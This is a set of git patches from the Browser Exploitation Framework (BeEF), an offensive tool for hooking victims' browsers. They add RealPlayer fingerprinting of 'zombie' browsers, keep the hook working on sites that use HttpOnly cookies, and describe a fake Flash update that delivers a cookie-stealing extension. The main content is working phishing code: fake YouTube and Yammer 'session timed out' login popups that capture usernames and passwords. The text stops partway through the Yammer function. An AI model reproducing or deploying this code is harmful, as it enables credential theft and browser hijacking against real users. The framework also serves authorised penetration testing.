             name: "Fake Flash Update"
-            description: "Prompts the user to install an update to Adobe Flash Player.<br />The file to be delivered could be a Chrome or Firefox extension. <br /><br /> A Chrome extension has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.<br /><br />The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.<br />See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
+            description: "Prompts the user to install an update to Adobe Flash Player.<br />The file to be delivered could be a Chrome or Firefox extension. <br /><br /> A Chrome extension has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded. See extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome.<br /><br />The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.<br />See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
             authors: ["mh", "antisnatchor"]
             target:
                 user_notify: ['ALL']

From 63695e66d7936b6d52547962e58263721cfae2b6 Mon Sep 17 00:00:00 2001
From: gcatt <giov.catt@gmail.com>
Date: Sun, 17 Feb 2013 12:37:56 +0100
Subject: [PATCH 205/397] Add RealPlayer detection

---
 core/main/client/browser.js                   | 53 +++++++++++++++++++
 core/main/handlers/browserdetails.rb          |  8 +++
 .../admin_ui/controllers/modules/modules.rb   |  1 +
 .../admin_ui/controllers/panel/panel.rb       |  7 +--
 .../media/javascript/ui/panel/ZombiesMgr.js   |  2 +
 extensions/console/lib/shellinterface.rb      |  1 +
 modules/browser/detect_realplayer/command.js  | 14 +++++
 modules/browser/detect_realplayer/config.yaml | 15 ++++++
 modules/browser/detect_realplayer/module.rb   | 14 +++++
 9 files changed, 112 insertions(+), 3 deletions(-)
 create mode 100644 modules/browser/detect_realplayer/command.js
 create mode 100644 modules/browser/detect_realplayer/config.yaml
 create mode 100644 modules/browser/detect_realplayer/module.rb

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 9d3cc9beb..a11a6f4f2 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -886,6 +886,57 @@ beef.browser = {
 
         return quicktime;
 
+    },
+
+	/**
+     * Checks if the zombie has the RealPlayer plugin installed.
+     * @return: {Boolean} true or false.
+     *
+     * @example: if ( beef.browser.hasRealPlayer() ) { ... }
+     */
+    hasRealPlayer:function () {
+
+        var realplayer = false;
+
+        // Not Internet Explorer
+        if (!this.type().IE) {
+
+            for (i = 0; i < navigator.plugins.length; i++) {
+
+                if (navigator.plugins[i].name.indexOf("RealPlayer") >= 0) {
+                    realplayer = true;
+                }
+
+            }
+
+            // Internet Explorer
+        } else {
+	
+			var definedControls = [
+			    'RealPlayer',
+				'rmocx.RealPlayer G2 Control',
+			    'rmocx.RealPlayer G2 Control.1',
+			    'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
+			    'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'			    
+				];
+			
+			for (var i = 0; i < definedControls.length; i++) {
+
+            	try {
+
+                	var rp_test = new ActiveXObject(definedControls[i]);
+
+            	} catch (e) {
+            	}
+
+            	if ( rp_test ) {
+                	realplayer = true;
+            	}
+			}
+        }
+
+        return realplayer;
+
     },
 
     /**
@@ -2076,6 +2127,7 @@ beef.browser = {
         var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
         var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
 		var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
+		var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
         var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
         var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
 
@@ -2106,6 +2158,7 @@ beef.browser = {
         if (has_activex) details['HasActiveX'] = has_activex;
         if (has_silverlight) details['HasSilverlight'] = has_silverlight;
 		if (has_quicktime) details['HasQuickTime'] = has_quicktime;
+		if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
         if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
         if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
 
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 97761aa5d..dee84e42a 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -270,6 +270,14 @@ module BeEF
           else
             self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
           end
+          
+          # get and store the yes|no value for HasRealPlayer
+          has_realplayer = get_param(@data['results'], 'HasRealPlayer')
+          if BeEF::Filters.is_valid_yes_no?(has_realplayer)
+            BD.set(session_id, 'HasRealPlayer', has_realplayer)
+          else
+            self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
+          end
 
           # get and store the value for CPU
           cpu_type = get_param(@data['results'], 'CPU')
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 79ed04767..3425a48c4 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -82,6 +82,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         ['Browser Components', 'Silverlight',        'HasSilverlight'],
         ['Browser Components', 'Web Sockets',        'HasWebSocket'],
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
+        ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index b853350db..15efc31ff 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -90,7 +90,8 @@ module BeEF
             has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
             has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
             has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
-			has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
+			      has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
+						has_realplayer  = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
             date_stamp      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
 
             return {
@@ -110,8 +111,8 @@ module BeEF
                 'has_googlegears' => has_googlegears,
                 'has_java'        => has_java,
                 'has_activex'     => has_activex,
-                'has_silverlight' => has_silverlight,
-				'has_quicktime'   => has_quicktime,
+				        'has_quicktime'   => has_quicktime,
+				        'has_realplayer'  => has_realplayer,
                 'date_stamp'      => date_stamp
             }
 
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index 0dad2631e..ff5eb12ec 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -30,6 +30,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_activex        = zombie_array[index]["has_activex"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var has_quicktime      = zombie_array[index]["has_quicktime"];
+		var has_realplayer     = zombie_array[index]["has_realplayer"];
 		var date_stamp         = zombie_array[index]["date_stamp"];
 
 		text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
@@ -48,6 +49,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
+		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
 		balloon_text+= "<br/>Date: "           + date_stamp;
 		
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 68fe1b5f0..85f9198f0 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -298,6 +298,7 @@ class ShellInterface
         ['Browser Components', 'Silverlight',        'HasSilverlight'],
         ['Browser Components', 'Web Sockets',        'HasWebSocket'],
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
+        ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
diff --git a/modules/browser/detect_realplayer/command.js b/modules/browser/detect_realplayer/command.js
new file mode 100644
index 000000000..0b700ada2
--- /dev/null
+++ b/modules/browser/detect_realplayer/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = ( beef.browser.hasRealPlayer() )? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "realplayer="+result);
+
+});
+
diff --git a/modules/browser/detect_realplayer/config.yaml b/modules/browser/detect_realplayer/config.yaml
new file mode 100644
index 000000000..5be73c568
--- /dev/null
+++ b/modules/browser/detect_realplayer/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_realplayer:
+            enable: true
+            category: "Browser"
+            name: "Detect RealPlayer"
+            description: "This module will check if the browser has RealPlayer support."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
diff --git a/modules/browser/detect_realplayer/module.rb b/modules/browser/detect_realplayer/module.rb
new file mode 100644
index 000000000..60dec55e1
--- /dev/null
+++ b/modules/browser/detect_realplayer/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_realplayer < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['realplayer'] = @datastore['realplayer']
+		save content
+	end
+
+end

From 007769aa939e68cf63071640cdf3eb98af0a820e Mon Sep 17 00:00:00 2001
From: gcatt <giov.catt@gmail.com>
Date: Sun, 17 Feb 2013 12:41:30 +0100
Subject: [PATCH 206/397] Corrected mistake

---
 extensions/admin_ui/controllers/panel/panel.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index 15efc31ff..6c99bafbf 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -111,6 +111,7 @@ module BeEF
                 'has_googlegears' => has_googlegears,
                 'has_java'        => has_java,
                 'has_activex'     => has_activex,
+                'has_silverlight' => has_silverlight,
 				        'has_quicktime'   => has_quicktime,
 				        'has_realplayer'  => has_realplayer,
                 'date_stamp'      => date_stamp

From c222d0e4e3d042735e64928d1db75bd94e090727 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 18 Feb 2013 17:19:49 +0000
Subject: [PATCH 207/397] Patched BeEF hook core to support injection when the
 hooked domain uses HttpOnly.

---
 core/main/client/browser.js        | 20 ++++++++++++++------
 core/main/client/lib/evercookie.js | 21 +++++++++++++--------
 2 files changed, 27 insertions(+), 14 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index ae679a8de..0ab8b9145 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -2101,7 +2101,6 @@ beef.browser = {
         var browser_name = beef.browser.getBrowserName();
         var browser_version = beef.browser.getBrowserVersion();
         var browser_reported_name = beef.browser.getBrowserReportedName();
-        var cookies = document.cookie;
         var page_title = (document.title) ? document.title : "Unknown";
         var page_uri = document.location.href;
         var page_referrer = (document.referrer) ? document.referrer : "Unknown";
@@ -2129,13 +2128,24 @@ beef.browser = {
         var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
 		var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
 		var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
-        var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
-        var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
+        try{
+            var cookies = document.cookie;
+            var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
+            var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
+            if (cookies) details["Cookies"] = cookies;
+            if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
+            if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
+        }catch(e){
+            // the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
+            // and there is no reason to read cookies at this point
+            details["Cookies"] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
+            details["hasSessionCookies"] = "No";
+            details["hasPersistentCookies"] = "No";
+        }
 
         if (browser_name) details["BrowserName"] = browser_name;
         if (browser_version) details["BrowserVersion"] = browser_version;
         if (browser_reported_name) details["BrowserReportedName"] = browser_reported_name;
-        if (cookies) details["Cookies"] = cookies;
         if (page_title) details["PageTitle"] = page_title;
         if (page_uri) details["PageURI"] = page_uri;
         if (page_referrer) details["PageReferrer"] = page_referrer;
@@ -2161,8 +2171,6 @@ beef.browser = {
         if (has_silverlight) details['HasSilverlight'] = has_silverlight;
 		if (has_quicktime) details['HasQuickTime'] = has_quicktime;
 		if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
-        if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
-        if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
 
         return details;
     },
diff --git a/core/main/client/lib/evercookie.js b/core/main/client/lib/evercookie.js
index cf5609a1e..2c9fc1388 100644
--- a/core/main/client/lib/evercookie.js
+++ b/core/main/client/lib/evercookie.js
@@ -793,14 +793,19 @@ this.waitForSwf = function(i)
 
 this.evercookie_cookie = function(name, value)
 {
-	if (typeof(value) != "undefined")
-	{
-		// expire the cookie first
-		document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
-		document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
-	}
-	else
-		return this.getFromStr(name, document.cookie);
+    try{
+        if (typeof(value) != "undefined")
+        {
+            // expire the cookie first
+            document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
+            document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
+        }
+        else
+            return this.getFromStr(name, document.cookie);
+    }catch(e){
+        // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
+        // evercookie_userdata and evercookie_window will be used in this case.
+    }
 };
 
 // get value from param-like string (eg, "x=y&name=VALUE")

From 753a78f5fc35c4b22a5d9cb096d1c2be8c0b7f84 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Tue, 19 Feb 2013 15:19:27 +1030
Subject: [PATCH 208/397] Add YouTube template to Pretty Theft module

---
 .../pretty_theft/command.js                   | 52 +++++++++++++++----
 .../social_engineering/pretty_theft/module.rb |  2 +-
 2 files changed, 43 insertions(+), 11 deletions(-)

diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js
index fea87a230..c29ca3060 100644
--- a/modules/social_engineering/pretty_theft/command.js
+++ b/modules/social_engineering/pretty_theft/command.js
@@ -163,6 +163,35 @@ beef.execute(function() {
 		credgrabber = setInterval(checker,1000);
 	}
 
+	// YouTube floating div
+	function youtube() {
+
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'popup');
+		sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;');
+		document.body.appendChild(sneakydiv);
+
+		// Set appearance using styles, maybe cleaner way to do this with CSS block?
+		var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"';
+		var windowmain = 'style="border:1px #555 solid;"';
+ 		var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top,  #919191,  #595959);"';
+		var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
+		var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
+		var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"';
+		var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"';	
+		var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
+		var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';
+        	var title = 'Session Timed Out <img src="' + logo + '" align=right height=20 width=70 alt="YouTube">';
+	        var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
+        	var buttonLabel = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
+
+		// Build page including styles
+		sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Username: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>';
+
+		// Repeatedly check if button has been pressed
+		credgrabber = setInterval(checker,1000);
+
+	}
 
 	// Generic floating div with image
 	function generic() {
@@ -181,19 +210,22 @@ beef.execute(function() {
 	// Set background opacity and apply background 
 	var backcolor = "<%== @backing %>";	  
 	if(backcolor == "Grey"){
-	grayOut(true,{'opacity':'70'});
-	}else if(backcolor == "Clear"){
-	grayOut(true,{'opacity':'0'});
+		grayOut(true,{'opacity':'70'});
+	} else if(backcolor == "Clear"){
+		grayOut(true,{'opacity':'0'});
 	}
 
-	// Retrieve the chosen div option from Beef and display
+	// Retrieve the chosen div option from BeEF and display
 	var choice = "<%= @choice %>";	
-	if(choice == "Facebook"){	
-	facebook();
-	} else if(choice == "LinkedIn"){
-	linkedin();	
-	} else{
-	generic();	
+	switch (choice) {
+		case "Facebook":
+			facebook(); break;
+		case "LinkedIn":
+			linkedin(); break;
+		case "YouTube":
+			youtube();  break;
+		default:
+			generic();  break;
 	}
 
 });
diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb
index bb58c0a8f..3a15d7be5 100644
--- a/modules/social_engineering/pretty_theft/module.rb
+++ b/modules/social_engineering/pretty_theft/module.rb
@@ -9,7 +9,7 @@ class Pretty_theft < BeEF::Core::Command
     configuration = BeEF::Core::Configuration.instance
     logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png"
     return [
-		{'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
+		{'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['YouTube'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
        		
 		{'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },
 

From 4718075b2c77cbcd67a4bb7e2fe7b1f9493efcf2 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Tue, 19 Feb 2013 16:01:10 +1030
Subject: [PATCH 209/397] Add Yammer template to Pretty Theft module

---
 .../pretty_theft/command.js                   | 54 +++++++++++++++----
 .../social_engineering/pretty_theft/module.rb |  2 +-
 2 files changed, 44 insertions(+), 12 deletions(-)

diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js
index c29ca3060..76a584672 100644
--- a/modules/social_engineering/pretty_theft/command.js
+++ b/modules/social_engineering/pretty_theft/command.js
@@ -172,18 +172,48 @@ beef.execute(function() {
 		document.body.appendChild(sneakydiv);
 
 		// Set appearance using styles, maybe cleaner way to do this with CSS block?
-		var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"';
-		var windowmain = 'style="border:1px #555 solid;"';
- 		var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top,  #919191,  #595959);"';
-		var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
-		var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
-		var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"';
+		var windowborder  = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"';
+		var windowmain    = 'style="border:1px #555 solid;"';
+ 		var tbarstyle     = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top,  #919191,  #595959);"';
+		var bbarstyle     = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
+		var messagestyle  = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
+		var box_prestyle  = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"';
 		var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"';	
-		var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
-		var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';
-        	var title = 'Session Timed Out <img src="' + logo + '" align=right height=20 width=70 alt="YouTube">';
-	        var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
-        	var buttonLabel = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
+		var buttonstyle   = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"';
+		var logo  = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';
+		var title = 'Session Timed Out <img src="' + logo + '" align=right height=20 width=70 alt="YouTube">';
+		var messagewords = 'Your session has timed out due to inactivity.<br/><br/>Please re-enter your username and password to login.';
+		var buttonLabel  = '<input type="button" name="ok" value="Sign In" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
+
+		// Build page including styles
+		sneakydiv.innerHTML= '<div id="window_container" '+windowborder+ '><div id="windowmain" ' +windowmain+ '><div id="title_bar" ' +tbarstyle+ '>' +title+ '</div><p id="message" ' +messagestyle+ '>' + messagewords + '</p><table><tr><td align="right"> <div id="box_pre" ' +box_prestyle+ '>Username: </div></td><td align="left"><input type="text" id="uname" value="" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="right"><div id="box_pre" ' +box_prestyle+ '>Password: </div></td><td align="left"><input type="password" id="pass" name="pass" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div>';
+
+		// Repeatedly check if button has been pressed
+		credgrabber = setInterval(checker,1000);
+
+	}
+
+	// Yammer floating div
+	function yammer() {
+
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'popup');
+		sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;');
+		document.body.appendChild(sneakydiv);
+
+		// Set appearance using styles, maybe cleaner way to do this with CSS block?
+		var windowborder  = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"';
+		var windowmain    = 'style="border:1px #555 solid;"';
+ 		var tbarstyle     = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top,  #919191,  #595959);"';
+		var bbarstyle     = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"';
+		var messagestyle  = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"';
+		var box_prestyle  = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"';
+		var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"';	
